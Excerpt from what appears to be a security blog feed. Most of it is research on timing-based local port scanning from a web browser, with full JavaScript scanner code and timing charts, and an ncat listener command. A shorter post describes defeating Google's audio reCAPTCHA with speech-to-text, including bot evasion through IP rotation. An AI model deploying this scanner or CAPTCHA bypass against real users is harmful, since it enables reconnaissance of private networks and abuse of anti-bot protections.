<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">30</span><span class="p">;</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timings</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timings</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePort</span><span class="p">(</span><span class="nx">port</span><span class="p">))</span>
<span class="p">}</span>
<span class="nx">timings</span><span class="p">.</span><span class="nx">sort</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">-</span> <span class="nx">b</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">timings</span><span class="p">)</span>
<span class="p">})();</span>
</code></pre></div>
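<p>Comparing two runs of 30 raw numbers by eye is tedious. The following helper is a minimal sketch that reduces one run to a few summary values. It assumes the timings are a plain array of milliseconds as produced above; the names <code>median</code> and <code>summarize</code> are made up for this illustration.</p>

```javascript
// Returns the median of an array of numbers without modifying the input.
function median(values) {
  if (values.length === 0) return NaN;
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1
    ? sorted[mid]
    : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Condenses one measurement run into count, minimum, median and maximum.
function summarize(timings) {
  return {
    n: timings.length,
    min: Math.min(...timings),
    median: median(timings),
    max: Math.max(...timings),
  };
}

// Example: pass the array logged by the measurement loop.
console.log(summarize([11.345, 12.11, 38.735, 940.86, 4986.875]));
```

<p>The median is used instead of the mean because a few throttled requests with delays of several seconds would otherwise dominate the result.</p>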
<p>The sorted response times are plotted in a line chart to show visually whether there is a significant difference between open and closed ports. I used <code>chart.js</code>.
The scale is logarithmic. It is very easy to spot that heavy throttling takes place.</p>
<script src="https://cdn.jsdelivr.net/npm/chart.js@2.8.0"></script>
<canvas id="chartJSContainer" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [11.345, 11.525, 11.555, 11.77, 12.11, 12.86, 13.84, 16.055, 38.735, 43.125, 75.77, 91.45, 535.255, 940.86, 1100.415, 1568.03, 1702.405, 1768.775, 1866.21, 2055.645, 2437.4, 2690.86, 3011.965, 3118.07, 3157.795, 3471.12, 4395.175, 4439.105, 4596.1, 4986.875],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [7.86, 10.035, 10.135, 10.275, 10.42, 10.74, 11.45, 17.12, 23.925, 25.935, 80.505, 212.785, 376.305, 663.645, 961.385, 1093.705, 1659.905, 1734.135, 2137.24, 3128.94, 3190.47, 3231.12, 3257.18, 3812.22, 3993.54, 4244.75, 4251.375, 4472.14, 4707.59, 4746.89],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
type: 'logarithmic',
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chartJSContainer').getContext('2d');
new Chart(ctx, options);
</script>
<p>This is very weird and inconsistent behavior. It seems like there is only a consistent pattern in the first 7 requests, then the open/closed property doesn't seem to correlate anymore.</p>
<p>And then I did the same for the Firefox browser (but only with 12 measurements, because throttling kicks in and the delays are becoming large):</p>
<canvas id="chartFirefox" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],
datasets: [
{
label: 'Firefox: Open Port Timings',
data: [ 48, 334, 501, 752, 1165, 1601, 2447, 3659, 5481, 8211, 12318, 18464],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Firefox: Closed Port Timings',
data: [ 34, 368, 551, 817, 1215, 1820, 2719, 4071, 6102, 9644, 13714, 20561],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
type: 'logarithmic',
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chartFirefox').getContext('2d');
new Chart(ctx, options);
</script>
<p>What we see here is that closed ports seem to take more time than open ports.</p>
<p><a href="https://datatracker.ietf.org/meeting/96/materials/slides-96-saag-1/">These slides</a> explain exactly which countermeasures are employed against browser-based port scanning. There is definitely throttling happening here.</p>
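<p>The throttling becomes more tangible when each Firefox delay is divided by the previous one. The sketch below does this for the open port measurements from the chart above; the function name <code>successiveRatios</code> is made up for this illustration.</p>

```javascript
// Divides every delay by its predecessor to expose the growth factor.
function successiveRatios(delays) {
  const ratios = [];
  for (let i = 1; i < delays.length; i++) {
    ratios.push(delays[i] / delays[i - 1]);
  }
  return ratios;
}

// Firefox open port timings in milliseconds, copied from the chart above.
const firefoxOpen = [48, 334, 501, 752, 1165, 1601, 2447, 3659, 5481, 8211, 12318, 18464];

const ratios = successiveRatios(firefoxOpen);
console.log(ratios.map((r) => r.toFixed(2)).join(', '));
```

<p>Apart from the very first step, the ratios stay close to 1.5. That would be consistent with an exponential back-off between connection attempts, but this is only a reading of the measured numbers and was not checked against the Firefox source code.</p>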
<h3>Statistics with Image Tags</h3>
<p>Port scanning can also be attempted by making requests with Image tags. This is the test that I used:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">timePortImage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// resolve with the elapsed time in milliseconds</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span> <span class="o">+</span> <span class="s1">'.png'</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">portOpen</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">portClosed</span> <span class="o">=</span> <span class="mf">9657</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">30</span><span class="p">;</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timingsOpen</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">timingsClosed</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timingsOpen</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portOpen</span><span class="p">))</span>
<span class="nx">timingsClosed</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portClosed</span><span class="p">))</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">timingsOpen</span><span class="p">))</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">timingsClosed</span><span class="p">))</span>
<span class="p">})();</span>
</code></pre></div>
<p>Port scanning with Image tags on Chrome with <code>N=20</code> and service <code>python -m http.server --bind localhost 8888</code>.</p>
<canvas id="chromeImage" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],
datasets: [
{
label: 'Open Port Timings',
data: [14.095,7.125,8.28,6.8,7.2,20.73,8.78,9.685,10.2,6.895,8.265,7.17,7.17,9.405,27.39,8.255,16.39,6.69,12.01,7.56],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [5.065,5.235,3.59,3.72,4.775,7.215,11.62,6.74,3.785,3.81,7.875,3.725,5.33,4.325,5.765,3.785,3.865,4.42,3.675,3.44],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImage').getContext('2d');
new Chart(ctx, options);
</script>
<p>Another sample of port scanning with Image tags on Chrome with <code>N=30</code> with a different HTTP server.</p>
<canvas id="chromeImage2" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [5.75,4.705,4.6,4.905,4.23,4.155,4.13,8.07,6.185,5.46,4.095,4.695,4.01,7.535,3.745,4.27,4.305,4.43,4.475,4.185,4.035,4.14,3.85,4.11,3.985,4.035,4.02,3.885,4,3.895],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [4.73,3.455,2.78,3.495,3.095,2.785,2.885,6.165,2.75,2.755,4.29,2.905,2.82,24.025,2.705,3.55,2.735,2.68,2.81,3.13,2.89,3.06,2.825,3.44,2.575,2.8,3.07,3.18,4.005,2.845],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImage2').getContext('2d');
new Chart(ctx, options);
</script>
<p>And a third example of port scanning with Image tags on Chrome with <code>N=30</code> with <code>nginx</code> running as a service on <code>localhost:3333</code>.</p>
<canvas id="chromeImageNginx" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [9.69,5.635,6.295,5.76,6.235,6.49,13.84,6.815,7.58,5.13,7.47,6.135,5.83,7.015,10.5,12.74,7.24,4.795,4.47,7.07,4.075,4.285,17.995,4.865,5.075,4.48,4.52,4.68,4.585,6.03],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [5.785,5.445,3.725,4.795,3.69,11.235,4.315,3.59,7.745,3.31,2.89,3.83,3.345,3.625,5.955,3.91,4.68,2.91,2.805,4.545,3.145,7.875,3.905,4.4,2.83,2.965,3.125,2.89,17.82,3.68],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImageNginx').getContext('2d');
new Chart(ctx, options);
</script>
<p>But what happens when the scanned service (open port) is not an HTTP server? What if it is, let's say, an unrelated TCP service?
This time, we will simply use <code>netcat</code> to simulate an arbitrary TCP service. There is no response from <code>netcat</code> on any incoming message.</p>
<p>We use the command <code>ncat -l 4444 --keep-open --exec "/bin/cat"</code> to launch a simple TCP echo server.</p>
<canvas id="netcatExample" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [9.94,5.955,6.285,5.495,9.68,5.665,6.715,9.57,9.135,6.835,6.165,6.18,5.21,5.64,5.415,5.065,5.465,5.21,5.265,13.48,6.78,6.855,5.25,7.405,5.435,4.93,5.695,5.125,5.77,4.93],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [4.805,4.255,4.055,7.98,4.07,4.31,3.75,3.67,4.775,4.385,4.165,4.51,3.73,3.825,3.925,3.82,4,6.3,3.765,5.615,5.59,4.18,3.855,5.805,5.155,8.605,3.65,3.815,3.72,4.325],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('netcatExample').getContext('2d');
new Chart(ctx, options);
</script>
<h3>Conclusion</h3>
<p>As the plots above demonstrate, it does not matter whether the scanned service is a toy HTTP server, a real HTTP server (nginx) or an arbitrary TCP service (netcat): the measured timings are significantly longer for open ports!</p>
<h3>Full Algorithm to Determine if a Port is open or not</h3>
<p>Now we have enough information to design an algorithm that makes a very educated guess whether a port is open or not.</p>
<p>Our algorithm is very simple:</p>
<p>We want to determine if port <code>p</code> is open or not.</p>
<p>We take <code>N=30</code> measurements of port <code>p</code> and <code>N=30</code> measurements of a port <code>q</code> that is very likely closed (let's say port <code>q = 37857</code>).</p>
<p>If</p>
<ol>
<li>80% of all measurements of <code>p</code> are larger than the measurements of <code>q</code></li>
<li>and the sum of all measurements of <code>p</code> is at least <strong>1.3</strong> times larger than the sum of all measurements of <code>q</code></li>
</ol>
<p>we consider the port <code>p</code> to be open.</p>
<p>Of course our assumption is that <code>q</code> is closed ;)</p>
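<p>Stripped of all measuring code, the decision rule can be sketched as a pure function. This is only an illustration under one assumption: the measurements of <code>p</code> and <code>q</code> are compared pairwise by index, since the text above does not spell out how the 80% are counted. The name <code>looksOpen</code> and its parameters are hypothetical.</p>

```javascript
// Hypothetical helper: applies the two criteria to two timing arrays.
// Assumption: measurement i of p is compared with measurement i of q.
function looksOpen(timingsP, timingsQ, minShare = 0.8, minSumRatio = 1.3) {
  const n = Math.min(timingsP.length, timingsQ.length);
  if (n === 0) return false; // no data, no verdict

  let larger = 0;
  let sumP = 0;
  let sumQ = 0;
  for (let i = 0; i < n; i++) {
    if (timingsP[i] > timingsQ[i]) larger++;
    sumP += timingsP[i];
    sumQ += timingsQ[i];
  }

  // Criterion 1: share of p measurements that exceed their q counterpart.
  // Criterion 2: total time for p compared to total time for q.
  return larger / n >= minShare && sumP >= minSumRatio * sumQ;
}

console.log(looksOpen([10, 10, 10, 10, 10], [5, 5, 5, 5, 5]));
```

<p>Requiring both criteria makes the rule more robust against single outliers: one very slow request can inflate the sum, but it cannot push the share of larger measurements above 80%.</p>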
<p>The full code is as follows:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Author: Nikolai Tschacher</span>
<span class="c1">// tested on Chrome v86 on Ubuntu 18.04</span>
<span class="kd">var</span> <span class="nx">portIsOpen</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">hostToScan</span><span class="p">,</span> <span class="nx">portToScan</span><span class="p">,</span> <span class="nx">N</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">portIsOpen</span> <span class="o">=</span> <span class="s1">'unknown'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">timePortImage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// onerror fires once the request fails; resolve with the elapsed time in milliseconds</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://"</span> <span class="o">+</span> <span class="nx">hostToScan</span> <span class="o">+</span> <span class="s2">":"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span> <span class="o">+</span> <span class="s1">'.png'</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">portClosed</span> <span class="o">=</span> <span class="mf">37857</span><span class="p">;</span> <span class="c1">// let's hope it's closed :D</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timingsOpen</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">timingsClosed</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timingsOpen</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portToScan</span><span class="p">))</span>
<span class="nx">timingsClosed</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portClosed</span><span class="p">))</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">sum</span> <span class="o">=</span> <span class="p">(</span><span class="nx">arr</span><span class="p">)</span> <span class="p">=></span> <span class="nx">arr</span><span class="p">.</span><span class="nx">reduce</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">+</span> <span class="nx">b</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">sumOpen</span> <span class="o">=</span> <span class="nx">sum</span><span class="p">(</span><span class="nx">timingsOpen</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">sumClosed</span> <span class="o">=</span> <span class="nx">sum</span><span class="p">(</span><span class="nx">timingsClosed</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">test1</span> <span class="o">=</span> <span class="nx">sumOpen</span> <span class="o">>=</span> <span class="p">(</span><span class="nx">sumClosed</span> <span class="o">*</span> <span class="mf">1.3</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">test2</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">m</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">timingsOpen</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">></span> <span class="nx">timingsClosed</span><span class="p">[</span><span class="nx">i</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">m</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">// 80% of timings of open port must be larger than closed ports</span>
<span class="nx">test2</span> <span class="o">=</span> <span class="p">(</span><span class="nx">m</span> <span class="o">>=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="mf">0.8</span> <span class="o">*</span> <span class="nx">N</span><span class="p">));</span>
<span class="nx">portIsOpen</span> <span class="o">=</span> <span class="nx">test1</span> <span class="o">&&</span> <span class="nx">test2</span><span class="p">;</span>
<span class="nx">resolve</span><span class="p">([</span><span class="nx">portIsOpen</span><span class="p">,</span> <span class="nx">m</span><span class="p">,</span> <span class="nx">sumOpen</span><span class="p">,</span> <span class="nx">sumClosed</span><span class="p">]);</span>
<span class="p">})();</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="c1">// how to use</span>
<span class="nx">portIsOpen</span><span class="p">(</span><span class="s1">'localhost'</span><span class="p">,</span> <span class="mf">8888</span><span class="p">,</span> <span class="mf">30</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="p">[</span><span class="nx">isOpen</span><span class="p">,</span> <span class="nx">m</span><span class="p">,</span> <span class="nx">sumOpen</span><span class="p">,</span> <span class="nx">sumClosed</span><span class="p">]</span> <span class="o">=</span> <span class="nx">res</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Is localhost:8888 open? '</span> <span class="o">+</span> <span class="nx">isOpen</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>Breaking the Google Audio reCAPTCHA with Google's own Speech to Text API2021-01-02T19:16:00+01:002021-01-05T18:45:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-02:/2021/01/02/breaking-audio-recaptcha-with-googles-own-speech-to-text-api/<p>In this project, I make use of a method from early 2019 that demonstrates how to solve the Audio reCAPTCHA with Google's own Speech to Text API. This method still works, which is quite astonishing.</p><h3>Video Demonstration and Explanation</h3>
<p>In the YouTube video below, I explain the technical details behind solving the Google Audio reCAPTCHA. I even make some remarks about the philosophical implications of AI becoming smarter than humans in certain fields. I am in no way qualified to talk about such matters though ;)</p>
<div class="embed-youtube" style="margin-bottom: 30px">
<iframe width="750" height="563" src="https://www.youtube.com/embed/1kBmbEwJpYo" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
</div>
<div><a class="btn" style="width: 240px" href="https://github.com/NikolaiT/uncaptcha3">Link to GitHub repository</a></div>
<h3>Introduction</h3>
<p>This blog article builds on the fantastic research by the authors of the <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2 repository</a>. The original <a href="https://uncaptcha.cs.umd.edu/papers/uncaptcha_woot17.pdf">scientific uncaptcha paper</a> proposes a method to solve Google's Audio reCAPTCHA with Google's own Speech-to-Text API.</p>
<p>Yes, you read that correctly: <strong>It is possible to solve the Audio version of reCAPTCHA v2 with Google's own <a href="https://cloud.google.com/speech-to-text">Speech-to-Text API</a>.</strong></p>
<p>Even worse: reCAPTCHA v2 is still used in the <a href="https://developers.google.com/recaptcha/docs/v3">new reCAPTCHA v3</a> as a fall-back mechanism.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/homer.webp" alt="Homer being Homer" />
<figcaption>No description needed. <span style="font-size: 60%">(Source: https://i.giphy.com/media/xT5LMzIK1AdZJ4cYW4/giphy.webp)</span></figcaption>
</figure>
<p>Since <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a> was released on <strong>January 18, 2019</strong>,
their proof of concept code no longer works (as the authors correctly predicted).</p>
<p>This blog post attempts to keep the proof of concept up to date and working.</p>
<h3>How does it work?</h3>
<p>Everyone knows and hates reCAPTCHA. It looks like this:</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/ReCaptcha.png" alt="ReCaptcha" />
<figcaption>The reCAPTCHA we all love</figcaption>
</figure>
<p>For the inclusion of visually impaired people, there is also an audio version of reCAPTCHA.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/AudioReCaptcha.png" alt="AudioReCaptcha" />
<figcaption>The audio version. <a href="https://incolumitas.com/images/audioReCaptcha.mp3">This is how it sounds</a></figcaption>
</figure>
<p>The idea of the attack is very simple: You grab the mp3 file of the audio reCAPTCHA and you submit it to Google's own Speech to Text API.</p>
<p><strong>Google will return the correct answer in over 97% (* Edit: 91%) of all cases.</strong></p>
<p>* The figure of 91% comes from the original <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a> repository. I have not run statistically significant tests with the current bot, but based on intuition, the success rate seems to be above 90% when you rotate IP addresses and browser fingerprints.</p>
<h3>Proof of Concept</h3>
<p>All mouse movements are done by the bot. Movements are randomized to some degree.</p>
<div class="embed-youtube">
<iframe width="750" height="563" src="https://www.youtube.com/embed/xh145UIeN9M" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
</div>
<h3>Conclusion</h3>
<p>We do live in astonishing times.</p>Deploy an Express App with Nginx and forward real IP Address2020-12-31T14:48:00+01:002020-12-31T14:48:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-31:/2020/12/31/express-with-nginx-and-forward-real-ip-address/<p>In this tutorial it is demonstrated how an Express App is deployed with Nginx as a reverse proxy. Static files are served with Nginx and the real IP address is forwarded to the Express app.</p><p><a href="https://expressjs.com/">Express</a> is probably one of the most widely used web frameworks out there. It is incredibly easy to use and extremely powerful. <a href="http://nginx.org/">Nginx</a> is one of the most popular web servers and is often used as a reverse proxy. Nginx is super fast and powerful, making it one of the go-to choices when deploying web servers.</p>
<p>In this blog article it is shown how an Express application can be deployed with Nginx as a reverse proxy. The following common problems will be solved:</p>
<ol>
<li>How to forward the remote IP address of a client to the web app from Nginx</li>
<li>How to serve static files with Nginx</li>
<li>Bonus: Deploy SSL certificates with <a href="https://letsencrypt.org/">Let's Encrypt</a></li>
</ol>
<p>You can follow each step along in this tutorial.</p>
<p>Important: It is assumed that every step in this tutorial is performed on a VPS that is publicly accessible from the Internet.
To be specific, an Ubuntu 18.04 Linux server is used. The instructions should be identical for Ubuntu 20.04.</p>
<h3>Setting up the project</h3>
<p>You need to have <a href="https://www.digitalocean.com/community/tutorials/how-to-install-node-js-on-ubuntu-18-04">Node.js and npm installed</a>.</p>
<p>Create the project directory and change into it.</p>
<div class="highlight"><pre><span></span><code>mkdir express-with-nginx
cd express-with-nginx/
</code></pre></div>
<p>Install express:</p>
<div class="highlight"><pre><span></span><code>npm install express
</code></pre></div>
<p>And then save the following server code as <code>server.js</code>:</p>
